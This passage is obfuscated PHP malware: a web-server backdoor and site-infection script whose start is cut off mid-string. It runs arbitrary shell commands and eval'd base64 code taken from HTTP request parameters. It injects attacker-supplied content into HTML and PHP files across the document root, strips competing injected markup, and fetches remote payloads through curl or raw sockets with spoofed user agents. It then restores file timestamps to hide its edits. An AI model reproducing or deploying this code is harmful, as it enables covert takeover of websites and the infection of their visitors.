", "", "/Location\:/", "Location: ", "\r", "\r\n\r\n", "", "Location:", "Location:", 'allow_url_fopen', '1', "

Can't download ", " - EXIT;

", '', "", "safe_mode", "open_basedir", "safe_mode_include_dir", "safe_mode_exec_dir", "disable_functions", "allow_url_fopen", 'max_execution_time', 'output_buffering', 'memory_limit', '64M', 'error_log', 'log_errors', 'file_uploads', 'allow_url_fopen', 'max_execution_time', 'output_buffering', 'memory_limit', '64M', 'error_log', 'log_errors', 'file_uploads', 'allow_url_fopen', 'DOCUMENT_ROOT', 'DOCUMENT_ROOT', '\\', '/', 'SCRIPT_FILENAME', 'PHP_SELF', "(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)", "/.*<\/ad>/si", "/.*<\/ads>/si", "/.*/si", "/.*<\/b1>/si", "//si", "//si", "/.*<\/ad>/s", "/.*<\/ems>/s", "/.*<\/block>/s", "/.*<\/dig>/s", "/.*<\/centr>/s", "/.*<\/cits>/s", "/.*<\/tbt>/s", "/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*.*<\/(span|font|div)>/Usi", "/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/.*<\/a>/Ui", "|", "| ", " |", " | ", "|", "|", "|", 'update1', "EXPC", 'update1', ',', "|", ".htm", ".shtm", "", "//i", "//i", "/<\/body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/html>/i", "", "/<\/html>/i", "", "w+", 'update2', 'update2', 'SCRIPT_FILENAME', '/', '1.php', '1.php', '/^\<\?php.*\?\>/Usi', '', "w", "

update

", 'update3', "

", 'update3', '', "\n", "r", "", "

", 'add1', "EXPC", 'add1', ',', "/var\sst1(.*)gr0\=0\;/i", "", "w", "ev1", "ev1", "info1", 'dGVzdDEyOA==', "", "", "//i", "//i", "/<\/body(.*)?>/i", "/<\/body(.*)?>/i", "/<\/html>/i", "", "/<\/html>/i", "w+", "", "w+", "get2", 'get2', 'DOCUMENT_ROOT', "/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", '/^http/i', '/'); return $a[$i]; } } if (!function_exists('rndc')) { function rndc() { $y_0 = round(0 + 1); $y_1 = round(0 + 1.6 + 1.6 + 1.6 + 1.6 + 1.6); $y_2 = emo(0); for ($y_3 = round(0);$y_3 < $y_1;$y_3++) { $y_4 = mt_rand(round(0 + 1), round(0 + 3.5 + 3.5)); switch ($y_4) { case ($y_4 <= round(0 + 0.5 + 0.5 + 0.5 + 0.5)): $y_2.= mt_rand(round(0), round(0 + 4.5 + 4.5)); break; case ($y_4 <= round(0 + 0.8 + 0.8 + 0.8 + 0.8 + 0.8)): $y_2.= chr(mt_rand(round(0 + 32.5 + 32.5), round(0 + 45 + 45))); break; case ($y_4 <= round(0 + 3 + 3)): $y_2.= chr(mt_rand(round(0 + 19.4 + 19.4 + 19.4 + 19.4 + 19.4), round(0 + 61 + 61))); break; case round(0 + 2.33333333333 + 2.33333333333 + 2.33333333333): $y_5 = strlen($y_2); if ($y_0 > round(0) && $y_5 > round(0) && $y_5 < ($y_1 - round(0 + 1)) && $y_2[$y_5 - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ] != emo(1)) { $y_2.= emo(2); $y_0--; } else { $y_3--; continue; } break; } } return $y_2; } } if (!function_exists('strrevpos')) { function strrevpos($y_6, $y_7) { $y_8 = strpos(strrev($y_6), strrev($y_7)); if ($y_8 === false) return false; else return strlen($y_6) - $y_8 - strlen($y_7); } } if (!function_exists('after')) { function after($this, $y_9) { if (!is_bool(strpos($y_9, $this))) return substr($y_9, strpos($y_9, $this) + strlen($this)); } } if (!function_exists('after_last')) { function after_last($this, $y_9) { if (!is_bool(strrevpos($y_9, $this))) return substr($y_9, strrevpos($y_9, $this) + strlen($this)); } } if (!function_exists('before')) { function before($this, $y_9) { return substr($y_9, round(0), strpos($y_9, $this)); } } if (!function_exists('before_last')) { function before_last($this, $y_9) { return substr($y_9, round(0), strrevpos($y_9, $this)); } } if (!function_exists('between')) { function between($this, $y_10, $y_9) { return before($y_10, after($this, $y_9)); } } if (!function_exists('between_last')) { function between_last($this, $y_10, $y_9) { return after_last($this, before_last($y_10, $y_9)); } } if (!function_exists('getfiles')) { function getfiles($y_11, $y_12, $y_13 = 0, $y_14 = "\\") { if (!is_dir($y_11)) { return null; }; $y_15 = ($y_14 == emo(3)) ? emo(4) : $y_14; $y_11 = str_replace($y_14, $y_15, $y_11); $y_11 = str_replace(emo(5), $y_15, $y_11); $y_11 = (strrpos($y_11, $y_15) == strlen($y_11) - round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)) ? substr($y_11, round(0), strlen($y_11) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) : $y_11; $y_16 = substr_count($y_11, $y_15); $y_13 = (!$y_13) ? -round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) : $y_13 + $y_16; $y_17 = array(); $y_18 = array(array($y_11, $y_16)); while (sizeof($y_18) && $y_18[round(0) ][round(0 + 0.5 + 0.5) ] != $y_13) { $y_19 = array_shift($y_18); $y_20 = opendir($y_19[round(0) ]); while (($y_21 = readdir($y_20)) !== false) { if (strrpos($y_21, emo(6)) === (strlen($y_21) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))) { continue; }; $y_22 = $y_19[round(0) ] . $y_15 . $y_21; if (is_dir($y_22)) { $y_23[] = $y_22; $y_18[] = array($y_22, substr_count($y_22, $y_15)); } else { foreach($y_12 as $y_3) { if (preg_match($y_3, $y_21)) { $y_17[] = $y_22; break; }; } }; }; } return $y_17; } } if (!function_exists('cc2')) { function cc2($y_24) { $y_25 = array(emo(7), emo(8), emo(9), emo(10)); if (function_exists('curl_init')) { $y_26 = $y_25[rand(round(0), count($y_25) - round(0 + 0.25 + 0.25 + 0.25 + 0.25)) ]; $y_27 = curl_init(); curl_setopt($y_27, 10002, $y_24); curl_setopt($y_27, 42, round(0)); curl_setopt($y_27, 13, round(0 + 30)); curl_setopt($y_27, 19913, round(0 + 0.25 + 0.25 + 0.25 + 0.25)); curl_setopt($y_27, 10018, $y_26); if (!(@ini_get(emo(11)) || @ini_get(emo(12)))) { @curl_setopt($y_27, 52, round(0 + 0.5 + 0.5)); } @curl_setopt($y_27, 68, round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4)); $y_28 = curl_exec($y_27); curl_close($y_27); if ($y_28 !== false) { return $y_28; } } else if (function_exists('fsockopen')) { global $y_29; $y_30 = $y_25[rand(round(0), count($y_25) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) ]; $y_24 = str_replace(emo(13), emo(14), $y_24); if (preg_match(emo(15), "$y_24")) { $y_31 = $y_24; $y_24 = @explode(emo(16), $y_24); $y_24 = $y_24[round(0) ]; $y_31 = str_replace($y_24, emo(17), $y_31); if (!$y_31 || $y_31 == emo(18)) { $y_31 = emo(19); } $y_32 = gethostbyname($y_24); } else { $y_32 = gethostbyname($y_24); $y_31 = emo(20); } $y_33 = fsockopen($y_32, round(0 + 16 + 16 + 16 + 16 + 16), $y_34, $y_35, round(0 + 10)); stream_set_timeout($y_33, round(0 + 5 + 5)); if ($y_33) { $y_36 = "GET $y_31 HTTP/1.0\r\n"; $y_36.= "Host: $y_24\r\n"; $y_36.= "Referer: http://$y_24$y_31\r\n"; $y_36.= emo(21); $y_36.= "User-Agent: $y_30\r\n"; $y_36.= emo(22); fputs($y_33, $y_36); while (!feof($y_33)) { $y_37.= fgets($y_33, round(0 + 1024 + 1024 + 1024 + 1024)); } fclose($y_33); $y_37 = @explode(emo(23), $y_37, round(0 + 1 + 1)); $y_38 = $y_37[round(0) ]; if ($y_29) { $y_38 = "$y_29

\n$y_38"; } $y_38 = str_replace(emo(24), emo(25), $y_38); if ($y_37[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ]) { $y_39 = $y_37[round(0 + 0.5 + 0.5) ]; } else { $y_39 = emo(26); } if ($y_39) { $y_37 = $y_39; } else { $y_37 = $y_38; } if (preg_match(emo(27), "$y_38")) { $y_24 = @explode(emo(28), $y_38); $y_24 = $y_24[round(0 + 0.5 + 0.5) ]; $y_24 = @explode(emo(29), $y_24); $y_24 = $y_24[round(0) ]; $y_29 = str_replace(emo(30), emo(31), $y_38); $y_40 = emo(32); $y_29 = str_replace(emo(33), $y_40, $y_29); return cc2($y_24); } else { return $y_37; } } } else if (ini_get(emo(34)) == emo(35)) { $y_28 = file_get_contents("http://$y_24"); if ($y_28 !== false) { return $y_28; } } else { echo emo(36) . $y_24 . emo(37); exit; } } } if (!function_exists('getcode')) { function getcode($y_31, $y_41) { $y_42 = emo(38); if (preg_match("/$y_41/", $y_31)) { $y_42 = preg_replace("/.*<\/b1>.*/msi", emo(39), $y_31); } return $y_42; } } @ignore_user_abort(round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); @set_magic_quotes_runtime(round(0)); @set_time_limit(round(0)); @error_reporting(round(0)); if (@function_exists('ini_restore')) { @ini_restore(emo(40)); @ini_restore(emo(41)); @ini_restore(emo(42)); @ini_restore(emo(43)); @ini_restore(emo(44)); @ini_restore(emo(45)); } if (@function_exists('ini_set')) { @ini_set(emo(46), round(0)); @ini_set(emo(47), round(0)); @ini_set(emo(48), emo(49)); @ini_set(emo(50), NULL); @ini_set(emo(51), round(0)); @ini_set(emo(52), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); @ini_set(emo(53), round(0 + 0.5 + 0.5)); } elseif (@function_exists('ini_alter')) { @ini_alter(emo(54), round(0)); @ini_alter(emo(55), round(0)); @ini_alter(emo(56), emo(57)); @ini_alter(emo(58), NULL); @ini_alter(emo(59), round(0)); @ini_alter(emo(60), round(0 + 1)); @ini_alter(emo(61), round(0 + 1)); } if (!isset($_SERVER[emo(62) ])) $_SERVER[emo(63) ] = str_replace(emo(64), emo(65), substr($_SERVER[emo(66) ], round(0), round(0) - strlen($_SERVER[emo(67) ]))); $y_43 = array(emo(68)); $y_44 = array(emo(69), emo(70), emo(71), emo(72), emo(73), emo(74), emo(75), emo(76), emo(77), emo(78), emo(79), emo(80), emo(81), emo(82), emo(83), emo(84), emo(85), emo(86), emo(87)); $y_45 = array(emo(88), emo(89), emo(90), emo(91), emo(92), emo(93), emo(94)); if (isset($_REQUEST[emo(95) ])) { $y_46 = explode(emo(96), gzinflate(base64_decode($_REQUEST[emo(97) ]))); $y_47 = $y_46[round(0) ]; $y_48 = explode(emo(98), $y_46[round(0 + 0.5 + 0.5) ]); foreach($y_48 as $y_49) { if (strlen($y_47) > round(0 + 1)) { $y_50 = explode(emo(99), $y_45[rand(round(0), count($y_45) - round(0 + 0.5 + 0.5)) ]); $y_47 = $y_50[round(0) ] . $y_47 . $y_50[round(0 + 0.5 + 0.5) ]; } $y_51 = false; $y_52 = false; if (!is_writable($y_49)) @chmod($y_49, round(0 + 84 + 84 + 84 + 84 + 84)); if (file_exists($y_49) && is_writable($y_49)) { $y_53 = false; if (eregi(emo(100), $y_49) !== false || eregi(emo(101), $y_49) !== false) $y_53 = true; $y_54 = trim(file_get_contents($y_49)); foreach($y_44 as $y_55) { if (preg_match($y_55, $y_54)) { $y_54 = preg_replace($y_55, emo(102), $y_54); $y_52 = true; } } if (preg_match(emo(103), $y_54, $y_56)) { $y_57 = $y_56[round(0) ]; $y_54 = preg_replace(emo(104), $y_57 . $y_47, $y_54); $y_51 = true; } else if (preg_match(emo(105), $y_54, $y_56)) { $y_57 = $y_56[round(0) ]; $y_54 = preg_replace(emo(106), $y_47 . $y_57, $y_54); $y_51 = true; } else if (preg_match(emo(107), $y_54, $y_56)) { $y_57 = emo(108) . $y_56[round(0) ]; $y_54 = preg_replace(emo(109), $y_47 . $y_57, $y_54); $y_51 = true; } else if ($y_53 == true) { $y_57 = $y_47 . emo(110); $y_54.= $y_57; $y_51 = true; } if ($y_51 == true || $y_52 == true) { $y_58 = @filemtime($y_49); $y_59 = fopen($y_49, emo(111)); fwrite($y_59, $y_54); fclose($y_59); @touch($y_49, $y_58, $y_58); if ($y_51 == true) echo "

update $y_49

"; if ($y_52 == true) echo "

spam removed $y_49

"; } } else { if (!file_exists($y_49)) echo "

no file $y_49

"; else if (!is_writable($y_49)) echo "

no rw file $y_49

"; } } } if (isset($_REQUEST[emo(112) ])) { $y_47 = gzinflate(base64_decode($_REQUEST[emo(113) ])); $y_60 = $_SERVER[emo(114) ]; $y_61 = before_last(emo(115), $y_60); if (!is_writable($y_61)) @chmod($y_61, round(0 + 210 + 210)); $y_62 = @filemtime($y_61); @copy($y_60, $y_60 . emo(116)); @touch($y_61, $y_62, $y_62); @touch($y_60 . emo(117), $y_62, $y_62); if (!is_writable($y_60)) @chmod($y_60, round(0 + 420)); if (is_writable($y_60)) { $y_54 = trim(file_get_contents($y_60)); $y_63 = preg_replace(emo(118), emo(119), $y_54); $y_58 = @filemtime($y_60); $y_59 = fopen($y_60, emo(120)); fwrite($y_59, $y_47 . $y_63); fclose($y_59); @touch($y_60, $y_58, $y_58); echo emo(121); } else { echo "

no rw $y_49

"; } } if (isset($_REQUEST[emo(122) ])) { echo emo(123); $y_64 = $_REQUEST[emo(124) ]; $y_46 = emo(125); if (!empty($y_64)) { if (function_exists('exec')) { @exec($y_64, $y_46); $y_46 = join(emo(126), $y_46); } elseif (function_exists('shell_exec')) { $y_46 = @shell_exec($y_64); } elseif (function_exists('system')) { @ob_start(); @system($y_64); $y_46 = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists('passthru')) { @ob_start(); @passthru($y_64); $y_46 = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($y_65 = @popen($y_64, emo(127)))) { $y_46 = emo(128); while (!@feof($y_65)) { $y_46.= @fread($y_65, round(0 + 512 + 512)); } @pclose($y_65); } } echo $y_46; echo emo(129); } if (isset($_REQUEST[emo(130) ])) { $y_46 = explode(emo(131), gzinflate(base64_decode($_REQUEST[emo(132) ]))); $y_47 = $y_46[round(0) ]; $y_48 = explode(emo(133), $y_46[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ]); foreach($y_48 as $y_49) { $y_51 = false; $y_52 = false; if (!is_writable($y_49)) @chmod($y_49, round(0 + 420)); if (file_exists($y_49) && is_writable($y_49)) { $y_54 = trim(file_get_contents($y_49)); $y_54 = preg_replace(emo(134), emo(135), $y_54); $y_54 = $y_47 . $y_54; $y_58 = @filemtime($y_49); $y_59 = fopen($y_49, emo(136)); fwrite($y_59, $y_54); fclose($y_59); @touch($y_49, $y_58, $y_58); echo "

update $y_49

"; } else { if (!file_exists($y_49)) echo "

no file $y_49

"; else if (!is_writable($y_49)) echo "

no w file $y_49

"; } } } if (isset($_REQUEST[emo(137) ])) { $y_66 = base64_decode($_REQUEST[emo(138) ]); eval($y_66); exit(); } if (isset($_REQUEST[emo(139) ])) { $y_67 = emo(140); $y_68 = @get_current_user(); echo emo(141) . base64_decode($y_67) . "(($y_68))#b#-->"; exit; } if (isset($_REQUEST[emo(142) ])) { $y_69 = $_REQUEST[emo(143) ]; $y_70 = $_SERVER[emo(144) ]; $y_41 = rndc(); $y_71 = array(emo(145)); $y_48 = array(); $y_48 = @getfiles($y_70, $y_71, round(0 + 1.33333333333 + 1.33333333333 + 1.33333333333)); foreach($y_48 as $y_49) { $y_51 = false; $y_52 = false; if (@file_exists($y_49)) { if (!is_writable($y_49)) @chmod($y_49, round(0 + 420)); if (@is_writable($y_49)) { $y_72 = base64_encode(gzcompress($y_49, round(0 + 2.25 + 2.25 + 2.25 + 2.25))); $y_47 = emo(146) . $y_41 . $y_72 . emo(147); $y_54 = @trim(@file_get_contents($y_49)); foreach($y_44 as $y_55) { if (preg_match($y_55, $y_54)) { $y_54 = preg_replace($y_55, emo(148), $y_54); $y_52 = true; } } if (preg_match(emo(149), $y_54, $y_56)) { $y_57 = $y_56[round(0) ]; $y_54 = preg_replace(emo(150), $y_57 . $y_47, $y_54); $y_51 = true; } else if (preg_match(emo(151), $y_54, $y_56)) { $y_57 = $y_56[round(0) ]; $y_54 = preg_replace(emo(152), $y_47 . $y_57, $y_54); $y_51 = true; } else if (preg_match(emo(153), $y_54, $y_56)) { $y_57 = emo(154) . $y_56[round(0) ]; $y_54 = preg_replace(emo(155), $y_47 . $y_57, $y_54); $y_51 = true; } if ($y_51 == true || $y_52 == true) { $y_58 = @filemtime($y_49); $y_59 = @fopen($y_49, emo(156)); @fwrite($y_59, $y_54); @fclose($y_59); @touch($y_49, $y_58, $y_58); } } } } $y_73 = cc2($y_69); if (strlen($y_73) < round(0 + 5 + 5 + 5 + 5)) $y_73 = cc2("www.$y_69"); if (eregi($y_41, $y_73)) { $y_73 = gzuncompress(base64_decode(getcode($y_73, $y_41))); echo "#a#$y_73#b#"; } foreach($y_48 as $y_49) { $y_52 = false; if (file_exists($y_49)) { if (!is_writable($y_49)) @chmod($y_49, round(0 + 105 + 105 + 105 + 105)); if (is_writable($y_49)) { $y_54 = @trim(@file_get_contents($y_49)); foreach($y_44 as $y_55) { if (preg_match($y_55, $y_54)) { $y_54 = preg_replace($y_55, emo(157), $y_54); $y_52 = true; } } if ($y_52 == true) { $y_58 = @filemtime($y_49); $y_59 = @fopen($y_49, emo(158)); @fwrite($y_59, $y_54); @fclose($y_59); @touch($y_49, $y_58, $y_58); } } } } exit; } if (isset($_REQUEST[emo(159) ])) { $y_74 = array(); $y_69 = $_REQUEST[emo(160) ]; $y_70 = $_SERVER[emo(161) ]; $y_75 = cc2($y_69); if (strlen($y_75) < round(0 + 20)) $y_75 = cc2("www.$y_69"); preg_match_all(emo(162), $y_75, $y_42); foreach($y_42[round(0 + 0.666666666667 + 0.666666666667 + 0.666666666667) ] as $y_76) { if (preg_match(emo(163), $y_76)) { if (preg_match("/$y_69/i", $y_76)) { $y_65 = $y_70 . after($y_69, $y_76); if (@file_exists($y_65) && @is_writable($y_65)) $y_74[] = $y_65; } } else { $y_65 = $y_70 . emo(164) . $y_76; if (@file_exists($y_65) && @is_writable($y_65)) $y_74[] = $y_65; } } if (count($y_74) > round(0)) { $y_73 = $y_74[rand(round(0), count($y_74) - round(0 + 0.25 + 0.25 + 0.25 + 0.25)) ]; echo "#a#$y_73#b#"; } exit; } ?>